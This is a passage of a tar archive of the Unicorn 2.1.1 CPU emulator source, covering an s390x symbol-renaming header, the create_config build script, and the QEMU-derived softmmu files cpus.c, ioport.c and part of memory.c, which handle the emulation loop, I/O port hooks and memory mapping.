helper_gvec_nand helper_gvec_nand_s390x #define helper_gvec_nor helper_gvec_nor_s390x #define helper_gvec_eqv helper_gvec_eqv_s390x #define helper_gvec_ands helper_gvec_ands_s390x #define helper_gvec_xors helper_gvec_xors_s390x #define helper_gvec_ors helper_gvec_ors_s390x #define helper_gvec_shl8i helper_gvec_shl8i_s390x #define helper_gvec_shl16i helper_gvec_shl16i_s390x #define helper_gvec_shl32i helper_gvec_shl32i_s390x #define helper_gvec_shl64i helper_gvec_shl64i_s390x #define helper_gvec_shr8i helper_gvec_shr8i_s390x #define helper_gvec_shr16i helper_gvec_shr16i_s390x #define helper_gvec_shr32i helper_gvec_shr32i_s390x #define helper_gvec_shr64i helper_gvec_shr64i_s390x #define helper_gvec_sar8i helper_gvec_sar8i_s390x #define helper_gvec_sar16i helper_gvec_sar16i_s390x #define helper_gvec_sar32i helper_gvec_sar32i_s390x #define helper_gvec_sar64i helper_gvec_sar64i_s390x #define helper_gvec_shl8v helper_gvec_shl8v_s390x #define helper_gvec_shl16v helper_gvec_shl16v_s390x #define helper_gvec_shl32v helper_gvec_shl32v_s390x #define helper_gvec_shl64v helper_gvec_shl64v_s390x #define helper_gvec_shr8v helper_gvec_shr8v_s390x #define helper_gvec_shr16v helper_gvec_shr16v_s390x #define helper_gvec_shr32v helper_gvec_shr32v_s390x #define helper_gvec_shr64v helper_gvec_shr64v_s390x #define helper_gvec_sar8v helper_gvec_sar8v_s390x #define helper_gvec_sar16v helper_gvec_sar16v_s390x #define helper_gvec_sar32v helper_gvec_sar32v_s390x #define helper_gvec_sar64v helper_gvec_sar64v_s390x #define helper_gvec_eq8 helper_gvec_eq8_s390x #define helper_gvec_ne8 helper_gvec_ne8_s390x #define helper_gvec_lt8 helper_gvec_lt8_s390x #define helper_gvec_le8 helper_gvec_le8_s390x #define helper_gvec_ltu8 helper_gvec_ltu8_s390x #define helper_gvec_leu8 helper_gvec_leu8_s390x #define helper_gvec_eq16 helper_gvec_eq16_s390x #define helper_gvec_ne16 helper_gvec_ne16_s390x #define helper_gvec_lt16 helper_gvec_lt16_s390x #define helper_gvec_le16 helper_gvec_le16_s390x #define helper_gvec_ltu16 helper_gvec_ltu16_s390x #define helper_gvec_leu16 helper_gvec_leu16_s390x #define helper_gvec_eq32 helper_gvec_eq32_s390x #define helper_gvec_ne32 helper_gvec_ne32_s390x #define helper_gvec_lt32 helper_gvec_lt32_s390x #define helper_gvec_le32 helper_gvec_le32_s390x #define helper_gvec_ltu32 helper_gvec_ltu32_s390x #define helper_gvec_leu32 helper_gvec_leu32_s390x #define helper_gvec_eq64 helper_gvec_eq64_s390x #define helper_gvec_ne64 helper_gvec_ne64_s390x #define helper_gvec_lt64 helper_gvec_lt64_s390x #define helper_gvec_le64 helper_gvec_le64_s390x #define helper_gvec_ltu64 helper_gvec_ltu64_s390x #define helper_gvec_leu64 helper_gvec_leu64_s390x #define helper_gvec_ssadd8 helper_gvec_ssadd8_s390x #define helper_gvec_ssadd16 helper_gvec_ssadd16_s390x #define helper_gvec_ssadd32 helper_gvec_ssadd32_s390x #define helper_gvec_ssadd64 helper_gvec_ssadd64_s390x #define helper_gvec_sssub8 helper_gvec_sssub8_s390x #define helper_gvec_sssub16 helper_gvec_sssub16_s390x #define helper_gvec_sssub32 helper_gvec_sssub32_s390x #define helper_gvec_sssub64 helper_gvec_sssub64_s390x #define helper_gvec_usadd8 helper_gvec_usadd8_s390x #define helper_gvec_usadd16 helper_gvec_usadd16_s390x #define helper_gvec_usadd32 helper_gvec_usadd32_s390x #define helper_gvec_usadd64 helper_gvec_usadd64_s390x #define helper_gvec_ussub8 helper_gvec_ussub8_s390x #define helper_gvec_ussub16 helper_gvec_ussub16_s390x #define helper_gvec_ussub32 helper_gvec_ussub32_s390x #define helper_gvec_ussub64 helper_gvec_ussub64_s390x #define helper_gvec_smin8 
helper_gvec_smin8_s390x #define helper_gvec_smin16 helper_gvec_smin16_s390x #define helper_gvec_smin32 helper_gvec_smin32_s390x #define helper_gvec_smin64 helper_gvec_smin64_s390x #define helper_gvec_smax8 helper_gvec_smax8_s390x #define helper_gvec_smax16 helper_gvec_smax16_s390x #define helper_gvec_smax32 helper_gvec_smax32_s390x #define helper_gvec_smax64 helper_gvec_smax64_s390x #define helper_gvec_umin8 helper_gvec_umin8_s390x #define helper_gvec_umin16 helper_gvec_umin16_s390x #define helper_gvec_umin32 helper_gvec_umin32_s390x #define helper_gvec_umin64 helper_gvec_umin64_s390x #define helper_gvec_umax8 helper_gvec_umax8_s390x #define helper_gvec_umax16 helper_gvec_umax16_s390x #define helper_gvec_umax32 helper_gvec_umax32_s390x #define helper_gvec_umax64 helper_gvec_umax64_s390x #define helper_gvec_bitsel helper_gvec_bitsel_s390x #define cpu_restore_state cpu_restore_state_s390x #define page_collection_lock page_collection_lock_s390x #define page_collection_unlock page_collection_unlock_s390x #define free_code_gen_buffer free_code_gen_buffer_s390x #define tcg_exec_init tcg_exec_init_s390x #define tb_cleanup tb_cleanup_s390x #define tb_flush tb_flush_s390x #define tb_phys_invalidate tb_phys_invalidate_s390x #define tb_gen_code tb_gen_code_s390x #define tb_exec_lock tb_exec_lock_s390x #define tb_exec_unlock tb_exec_unlock_s390x #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_s390x #define tb_invalidate_phys_range tb_invalidate_phys_range_s390x #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_s390x #define tb_check_watchpoint tb_check_watchpoint_s390x #define cpu_io_recompile cpu_io_recompile_s390x #define tb_flush_jmp_cache tb_flush_jmp_cache_s390x #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_s390x #define translator_loop_temp_check translator_loop_temp_check_s390x #define translator_loop translator_loop_s390x #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_s390x #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_s390x #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_s390x #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_s390x #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_s390x #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_s390x #define unassigned_mem_ops unassigned_mem_ops_s390x #define floatx80_infinity floatx80_infinity_s390x #define dup_const_func dup_const_func_s390x #define gen_helper_raise_exception gen_helper_raise_exception_s390x #define gen_helper_raise_interrupt gen_helper_raise_interrupt_s390x #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_s390x #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_s390x #define gen_helper_cpsr_read gen_helper_cpsr_read_s390x #define gen_helper_cpsr_write gen_helper_cpsr_write_s390x #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_s390x #define helper_uc_s390x_exit helper_uc_s390x_exit_s390x #define tcg_s390_tod_updated tcg_s390_tod_updated_s390x #define tcg_s390_program_interrupt tcg_s390_program_interrupt_s390x #define tcg_s390_data_exception tcg_s390_data_exception_s390x #endif 
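/*
 * Illustrative sketch, not part of the source tree: the block of defines
 * above is a compile-time symbol-renaming scheme. Each target build includes
 * a header like this one so that every shared QEMU-internal function gets an
 * arch-suffixed linker symbol, letting several targets be linked into one
 * library without duplicate-symbol collisions. The names below (add,
 * add_s390x) are made up for the demo; only the pattern matches the header.
 */
#include <stdio.h>

#define add add_s390x   /* rename, as the per-target header does */

int add(int a, int b)   /* compiles and links as add_s390x() */
{
    return a + b;
}

#undef add

int main(void)
{
    /* The renamed symbol is callable under its suffixed name. */
    printf("%d\n", add_s390x(2, 3)); /* prints 5 */
    return 0;
}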
unicorn-2.1.1/qemu/scripts/
unicorn-2.1.1/qemu/scripts/create_config

#!/bin/sh

echo "/* Automatically generated by create_config - do not modify */"

while read line; do

case $line in
 VERSION=*) # configuration
    version=${line#*=}
    major=$(echo "$version" | cut -d. -f1)
    minor=$(echo "$version" | cut -d. -f2)
    micro=$(echo "$version" | cut -d. -f3)
    echo "#define QEMU_VERSION \"$version\""
    echo "#define QEMU_VERSION_MAJOR $major"
    echo "#define QEMU_VERSION_MINOR $minor"
    echo "#define QEMU_VERSION_MICRO $micro"
    ;;
 qemu_*dir=* | qemu_*path=*) # qemu-specific directory configuration
    name=${line%=*}
    value=${line#*=}
    define_name=$(echo $name | LC_ALL=C tr '[a-z]' '[A-Z]')
    eval "define_value=\"$value\""
    echo "#define CONFIG_$define_name \"$define_value\""
    # save for the next definitions
    eval "$name=\$define_value"
    ;;
 prefix=*)
    # save for the next definitions
    prefix=${line#*=}
    ;;
 IASL=*) # iasl executable
    value=${line#*=}
    echo "#define CONFIG_IASL $value"
    ;;
 CONFIG_AUDIO_DRIVERS=*)
    drivers=${line#*=}
    echo "#define CONFIG_AUDIO_DRIVERS \\"
    for drv in $drivers; do
      echo "    \"${drv}\",\\"
    done
    echo ""
    ;;
 CONFIG_BDRV_RW_WHITELIST=*)
    echo "#define CONFIG_BDRV_RW_WHITELIST\\"
    for drv in ${line#*=}; do
      echo "    \"${drv}\",\\"
    done
    echo "    NULL"
    ;;
 CONFIG_BDRV_RO_WHITELIST=*)
    echo "#define CONFIG_BDRV_RO_WHITELIST\\"
    for drv in ${line#*=}; do
      echo "    \"${drv}\",\\"
    done
    echo "    NULL"
    ;;
 CONFIG_*=y) # configuration
    name=${line%=*}
    echo "#define $name 1"
    ;;
 CONFIG_*=n) # configuration
    ;;
 CONFIG_*=*) # configuration
    name=${line%=*}
    value=${line#*=}
    echo "#define $name $value"
    ;;
 HAVE_*=y) # configuration
    name=${line%=*}
    echo "#define $name 1"
    ;;
 HAVE_*=*) # configuration
    name=${line%=*}
    value=${line#*=}
    echo "#define $name $value"
    ;;
 ARCH=*) # configuration
    arch=${line#*=}
    arch_name=$(echo $arch | LC_ALL=C tr '[a-z]' '[A-Z]')
    echo "#define HOST_$arch_name 1"
    ;;
 HOST_USB=*)
    # do nothing
    ;;
 HOST_CC=*)
    # do nothing
    ;;
 HOST_*=y) # configuration
    name=${line%=*}
    echo "#define $name 1"
    ;;
 HOST_*=*) # configuration
    name=${line%=*}
    value=${line#*=}
    echo "#define $name $value"
    ;;
 TARGET_BASE_ARCH=*) # configuration
    target_base_arch=${line#*=}
    base_arch_name=$(echo $target_base_arch | LC_ALL=C tr '[a-z]' '[A-Z]')
    echo "#define TARGET_$base_arch_name 1"
    ;;
 TARGET_XML_FILES=*)
    # do nothing
    ;;
 TARGET_ABI_DIR=*)
    # do nothing
    ;;
 TARGET_NAME=*)
    target_name=${line#*=}
    echo "#define TARGET_NAME \"$target_name\""
    ;;
 TARGET_DIRS=*)
    # do nothing
    ;;
 TARGET_*=y) # configuration
    name=${line%=*}
    echo "#define $name 1"
    ;;
 TARGET_*=*) # configuration
    name=${line%=*}
    value=${line#*=}
    echo "#define $name $value"
    ;;
 DSOSUF=*)
    echo "#define HOST_DSOSUF \"${line#*=}\""
    ;;
esac

done # read
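# Illustrative usage sketch (not part of the original script): create_config
# reads key=value lines on stdin and emits a C header on stdout. The file
# names below are assumptions for the example.
#
#   $ ./create_config < config-host.mak > config-host.h
#
# For instance, an input line "CONFIG_TCG=y" would come out as
# "#define CONFIG_TCG 1", and "VERSION=2.1.1" would expand into the
# QEMU_VERSION / QEMU_VERSION_MAJOR / _MINOR / _MICRO defines above.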
"#define TARGET_$base_arch_name 1" ;; TARGET_XML_FILES=*) # do nothing ;; TARGET_ABI_DIR=*) # do nothing ;; TARGET_NAME=*) target_name=${line#*=} echo "#define TARGET_NAME \"$target_name\"" ;; TARGET_DIRS=*) # do nothing ;; TARGET_*=y) # configuration name=${line%=*} echo "#define $name 1" ;; TARGET_*=*) # configuration name=${line%=*} value=${line#*=} echo "#define $name $value" ;; DSOSUF=*) echo "#define HOST_DSOSUF \"${line#*=}\"" ;; esac done # read �����������������������������������������unicorn-2.1.1/qemu/softmmu/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015645�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/softmmu/cpus.c�������������������������������������������������������������������0000664�0000000�0000000�00000014476�14675241067�0016777�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator * * Copyright (c) 2003-2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "sysemu/tcg.h" #include "sysemu/cpus.h" #include "qemu/bitmap.h" #include "tcg/tcg.h" #include "exec/tb-hash.h" #include "accel/tcg/translate-all.h" #include "uc_priv.h" int64_t cpu_icount_to_ns(int64_t icount) { // return icount << atomic_read(&timers_state.icount_time_shift); // from configure_icount(QemuOpts *opts, Error **errp) /* 125MIPS seems a reasonable initial guess at the guest speed. It will be corrected fairly quickly anyway. */ // timers_state.icount_time_shift = 3; return icount << 3; } bool cpu_is_stopped(CPUState *cpu) { return cpu->stopped; } /* return the time elapsed in VM between vm_start and vm_stop. Unless * icount is active, cpu_get_ticks() uses units of the host CPU cycle * counter. 
*/ int64_t cpu_get_ticks(void) { return cpu_get_host_ticks(); } /* Return the monotonic time elapsed in VM, i.e., * the time between vm_start and vm_stop */ int64_t cpu_get_clock(void) { return get_clock(); } static bool cpu_can_run(CPUState *cpu) { if (cpu->stop) { return false; } if (cpu_is_stopped(cpu)) { return false; } return true; } static void cpu_handle_guest_debug(CPUState *cpu) { cpu->stopped = true; } static int tcg_cpu_exec(struct uc_struct *uc) { int r; bool finish = false; while (!uc->exit_request) { CPUState *cpu = uc->cpu; //qemu_clock_enable(QEMU_CLOCK_VIRTUAL, // (cpu->singlestep_enabled & SSTEP_NOTIMER) == 0); if (cpu_can_run(cpu)) { uc->quit_request = false; r = cpu_exec(uc, cpu); // quit current TB but continue emulating? if (uc->quit_request && !uc->stop_request) { // reset stop_request uc->stop_request = false; // resume cpu cpu->halted = 0; cpu->exit_request = 0; cpu->exception_index = -1; cpu_resume(cpu); } else if (uc->stop_request) { //printf(">>> got STOP request!!!\n"); finish = true; break; } // save invalid memory access error & quit if (uc->invalid_error) { // printf(">>> invalid memory accessed, STOP = %u!!!\n", env->invalid_error); finish = true; break; } // printf(">>> stop with r = %x, HLT=%x\n", r, EXCP_HLT); if (r == EXCP_DEBUG) { cpu_handle_guest_debug(cpu); break; } if (r == EXCP_HLT) { //printf(">>> got HLT!!!\n"); finish = true; break; } } else if (cpu->stop || cpu->stopped) { // printf(">>> got stopped!!!\n"); break; } } uc->exit_request = 0; uc->cpu->exit_request = 0; uc->cpu->icount_decr_ptr->u16.high = 0; uc->cpu->tcg_exit_req = 0; return finish; } void cpu_resume(CPUState *cpu) { cpu->stop = false; cpu->stopped = false; } static void qemu_tcg_init_vcpu(CPUState *cpu) { /* * Initialize TCG regions--once. Now is a good time, because: * (1) TCG's init context, prologue and target globals have been set up. * (2) qemu_tcg_mttcg_enabled() works now (TCG init code runs before the * -accel flag is processed, so the check doesn't work then). */ tcg_region_init(cpu->uc->tcg_ctx); cpu->created = true; } void qemu_init_vcpu(CPUState *cpu) { cpu->nr_cores = 1; cpu->nr_threads = 1; cpu->stopped = true; qemu_tcg_init_vcpu(cpu); return; } void cpu_stop_current(struct uc_struct *uc) { if (uc->cpu) { uc->cpu->stop = false; uc->cpu->stopped = true; cpu_exit(uc->cpu); } } static inline gboolean uc_exit_invalidate_iter(gpointer key, gpointer val, gpointer data) { uint64_t exit = *((uint64_t*)key); uc_engine *uc = (uc_engine*)data; if (exit != 0) { // Unicorn: Why addr - 1? // // 0: INC ecx // 1: DEC edx <--- We put exit here, then the range of TB is [0, 1) // // While tb_invalidate_phys_range invalides [start, end) // // This function is designed to used with g_tree_foreach uc->uc_invalidate_tb(uc, exit - 1, 1); } return false; } void resume_all_vcpus(struct uc_struct* uc) { CPUState *cpu = uc->cpu; cpu->halted = 0; cpu->exit_request = 0; cpu->exception_index = -1; cpu_resume(cpu); /* static void qemu_tcg_cpu_loop(struct uc_struct *uc) */ cpu->created = true; while (true) { if (tcg_cpu_exec(uc)) { break; } } // clear the cache of the exits address, since the generated code // at that address is to exit emulation, but not for the instruction there. 
    // if we don't do this, next time we cannot emulate at that address
    if (uc->use_exits) {
        g_tree_foreach(uc->ctl_exits, uc_exit_invalidate_iter, (void*)uc);
    } else {
        uc_exit_invalidate_iter((gpointer)&uc->exits[uc->nested_level - 1], NULL, (gpointer)uc);
    }

    cpu->created = false;
}

void vm_start(struct uc_struct* uc)
{
    resume_all_vcpus(uc);
}

unicorn-2.1.1/qemu/softmmu/ioport.c

/*
 * QEMU System Emulator
 *
 * Copyright (c) 2003-2008 Fabrice Bellard
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

/*
 * Split out the ioport-related code from vl.c.
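 *
 * In Unicorn these helpers do not go through an I/O address space; each one
 * dispatches directly to the UC_HOOK_INSN callbacks registered for the x86
 * IN/OUT instructions, as the bodies below show.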
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/memory.h" #include "uc_priv.h" #include "tcg/tcg-apple-jit.h" void cpu_outb(struct uc_struct *uc, uint32_t addr, uint8_t val) { // address_space_write(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, // &val, 1); //LOG_IOPORT("outb: %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); // Unicorn: call registered OUT callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_OUT) { JIT_CALLBACK_GUARD(((uc_cb_insn_out_t)hook->callback)(uc, addr, 1, val, hook->user_data)); } } } void cpu_outw(struct uc_struct *uc, uint32_t addr, uint16_t val) { // uint8_t buf[2]; // stw_p(buf, val); // address_space_write(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, // buf, 2); //LOG_IOPORT("outw: %04"FMT_pioaddr" %04"PRIx16"\n", addr, val); // Unicorn: call registered OUT callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_OUT) { JIT_CALLBACK_GUARD(((uc_cb_insn_out_t)hook->callback)(uc, addr, 2, val, hook->user_data)); } } } void cpu_outl(struct uc_struct *uc, uint32_t addr, uint32_t val) { // uint8_t buf[4]; // stl_p(buf, val); // address_space_write(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, // buf, 4); //LOG_IOPORT("outl: %04"FMT_pioaddr" %08"PRIx32"\n", addr, val); // Unicorn: call registered OUT callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_OUT) { JIT_CALLBACK_GUARD(((uc_cb_insn_out_t)hook->callback)(uc, addr, 4, val, hook->user_data)); } } } uint8_t cpu_inb(struct uc_struct *uc, uint32_t addr) { // uint8_t val; // address_space_read(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, // &val, 1); //LOG_IOPORT("inb : %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); // Unicorn: call registered IN callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_IN) { uint8_t ret; JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_insn_in_t)hook->callback)(uc, addr, 1, hook->user_data)); return ret; } } return 0; } uint16_t cpu_inw(struct uc_struct *uc, uint32_t addr) { // uint8_t buf[2]; // uint16_t val; // address_space_read(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, buf, 2); // val = lduw_p(buf); //LOG_IOPORT("inw : %04"FMT_pioaddr" %04"PRIx16"\n", addr, val); // Unicorn: call registered IN callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_IN) { uint16_t ret; JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_insn_in_t)hook->callback)(uc, addr, 2, hook->user_data)); return ret; } } return 0; } uint32_t cpu_inl(struct uc_struct *uc, uint32_t addr) { // uint8_t buf[4]; // uint32_t val; // printf("inl_addr=%x\n", addr); // address_space_read(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, buf, 4); // val = ldl_p(buf); //LOG_IOPORT("inl : %04"FMT_pioaddr" %08"PRIx32"\n", addr, val); // Unicorn: call registered IN callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_IN) { uint32_t ret; JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_insn_in_t)hook->callback)(uc, addr, 4, hook->user_data)); return ret; } } return 0; } 
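For reference, this is how the callbacks consumed above are wired up from the host side through Unicorn's public API. A minimal sketch (the port numbers, return value, and omitted emulation setup are illustrative):

    /* hook_io.c - registering IN/OUT callbacks that cpu_inb()/cpu_outb()
     * above will dispatch to. */
    #include <unicorn/unicorn.h>
    #include <stdio.h>

    static uint32_t on_in(uc_engine *uc, uint32_t port, int size, void *user)
    {
        printf("IN  port=0x%x size=%d\n", port, size);
        return 0x41; /* value the guest's IN instruction receives */
    }

    static void on_out(uc_engine *uc, uint32_t port, int size, uint32_t value,
                       void *user)
    {
        printf("OUT port=0x%x size=%d value=0x%x\n", port, size, value);
    }

    int main(void)
    {
        uc_engine *uc;
        uc_hook hin, hout;

        uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
        /* begin > end (1, 0) means the hook covers all addresses; the
         * trailing argument selects the instruction, matching the
         * hook->insn == UC_X86_INS_IN / UC_X86_INS_OUT checks above. */
        uc_hook_add(uc, &hin, UC_HOOK_INSN, on_in, NULL, 1, 0, UC_X86_INS_IN);
        uc_hook_add(uc, &hout, UC_HOOK_INSN, on_out, NULL, 1, 0, UC_X86_INS_OUT);
        /* ... uc_mem_map(), uc_mem_write(), uc_emu_start() ... */
        uc_close(uc);
        return 0;
    }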
unicorn-2.1.1/qemu/softmmu/memory.c

/*
 * Physical memory management
 *
 * Copyright 2011 Red Hat, Inc. and/or its affiliates
 *
 * Authors:
 *  Avi Kivity <avi@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2.  See
 * the COPYING file in the top-level directory.
 *
 * Contributions after 2012-01-13 are licensed under the terms of the
 * GNU GPL, version 2 or (at your option) any later version.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/memory.h"
#include "qemu/bitops.h"
#include "exec/memory-internal.h"
#include "exec/ram_addr.h"
#include "sysemu/tcg.h"
#include "exec/exec-all.h"
#include "uc_priv.h"

//#define DEBUG_UNASSIGNED

void memory_region_transaction_begin(void);
void memory_region_transaction_commit(MemoryRegion *mr);

typedef struct AddrRange AddrRange;

/*
 * Note that signed integers are needed for negative offsetting in aliases
 * (large MemoryRegion::alias_offset).
 */
struct AddrRange {
    Int128 start;
    Int128 size;
};

// Unicorn engine
MemoryRegion *memory_map(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms)
{
    MemoryRegion *ram = g_new(MemoryRegion, 1);

    memory_region_init_ram(uc, ram, size, perms);
    if (ram->addr == -1 || !ram->ram_block) {
        // out of memory
        g_free(ram);
        return NULL;
    }

    memory_region_add_subregion_overlap(uc->system_memory, begin, ram, uc->snapshot_level);

    if (uc->cpu) {
        tlb_flush(uc->cpu);
    }

    return ram;
}

MemoryRegion *memory_map_ptr(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms, void *ptr)
{
    MemoryRegion *ram = g_new(MemoryRegion, 1);

    memory_region_init_ram_ptr(uc, ram, size, ptr);
    ram->perms = perms;
    if (ram->addr == -1 || !ram->ram_block) {
        // out of memory
        g_free(ram);
        return NULL;
    }

    memory_region_add_subregion(uc->system_memory, begin, ram);

    if (uc->cpu) {
        tlb_flush(uc->cpu);
    }

    return ram;
}

static void make_contained(struct uc_struct *uc, MemoryRegion *current)
{
    hwaddr addr = current->addr;
    MemoryRegion *container = g_new(MemoryRegion, 1);
    memory_region_init(uc, container, int128_get64(current->size));
    memory_region_del_subregion(uc->system_memory, current);
    memory_region_add_subregion_overlap(container, 0, current, current->priority);
    memory_region_add_subregion(uc->system_memory, addr, container);
}

MemoryRegion *memory_cow(struct uc_struct *uc, MemoryRegion *current, hwaddr begin, size_t size)
{
    hwaddr offset;
    hwaddr current_offset;
    MemoryRegion *ram = g_new(MemoryRegion, 1);

    assert((begin & ~TARGET_PAGE_MASK) == 0);
    assert((size & ~TARGET_PAGE_MASK) == 0);

    if (current->container == uc->system_memory) {
        make_contained(uc, current);
    }
    offset = begin - current->container->addr;
    current_offset = offset - current->addr;

    memory_region_init_ram(uc, ram, size, current->perms);
    if (ram->addr == -1 || !ram->ram_block) {
        g_free(ram);
        return NULL;
    }
    memory_region_transaction_begin();
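    /*
     * Copy-on-write step: duplicate the parent's backing bytes into the new
     * RAM region, then layer it over the parent at the current snapshot
     * level so that later accesses hit the copy instead of the original.
     */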
memcpy(ramblock_ptr(ram->ram_block, 0), ramblock_ptr(current->ram_block, current_offset), size); memory_region_add_subregion_overlap(current->container, offset, ram, uc->snapshot_level); if (uc->cpu) { tlb_flush(uc->cpu); } uc->memory_region_update_pending = true; memory_region_transaction_commit(ram); return ram; } static uint64_t mmio_read_wrapper(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned size) { mmio_cbs* cbs = (mmio_cbs*)opaque; // We have to care about 32bit target. addr = addr & ( (target_ulong)(-1) ); if (cbs->read) { return cbs->read(uc, addr, size, cbs->user_data_read); } else { return 0; } } static void mmio_write_wrapper(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t data, unsigned size) { mmio_cbs* cbs = (mmio_cbs*)opaque; // We have to care about 32bit target. addr = addr & ( (target_ulong)(-1) ); if (cbs->write) { cbs->write(uc, addr, size, data, cbs->user_data_write); } } static void mmio_region_destructor_uc(MemoryRegion *mr) { g_free(mr->opaque); } MemoryRegion *memory_map_io(struct uc_struct *uc, ram_addr_t begin, size_t size, uc_cb_mmio_read_t read_cb, uc_cb_mmio_write_t write_cb, void *user_data_read, void *user_data_write) { MemoryRegion *mmio = g_new(MemoryRegion, 1); mmio_cbs* opaques = g_new(mmio_cbs, 1); MemoryRegionOps *ops = &opaques->ops; opaques->read = read_cb; opaques->write = write_cb; opaques->user_data_read = user_data_read; opaques->user_data_write = user_data_write; memset(ops, 0, sizeof(*ops)); ops->read = mmio_read_wrapper; ops->read_with_attrs = NULL; ops->write = mmio_write_wrapper; ops->write_with_attrs = NULL; ops->endianness = DEVICE_NATIVE_ENDIAN; memory_region_init_io(uc, mmio, ops, opaques, size); mmio->destructor = mmio_region_destructor_uc; mmio->perms = 0; if (read_cb) mmio->perms |= UC_PROT_READ; if (write_cb) mmio->perms |= UC_PROT_WRITE; memory_region_add_subregion(uc->system_memory, begin, mmio); if (uc->cpu) tlb_flush(uc->cpu); return mmio; } void memory_region_filter_subregions(MemoryRegion *mr, int32_t level) { MemoryRegion *subregion, *subregion_next; memory_region_transaction_begin(); QTAILQ_FOREACH_SAFE(subregion, &mr->subregions, subregions_link, subregion_next) { if (subregion->priority >= level) { memory_region_del_subregion(mr, subregion); subregion->destructor(subregion); g_free(subregion); mr->uc->memory_region_update_pending = true; } } memory_region_transaction_commit(mr); } static void memory_region_remove_mapped_block(struct uc_struct *uc, MemoryRegion *mr, bool free) { size_t i; for (i = 0; i < uc->mapped_block_count; i++) { if (uc->mapped_blocks[i] == mr) { uc->mapped_block_count--; //shift remainder of array down over deleted pointer 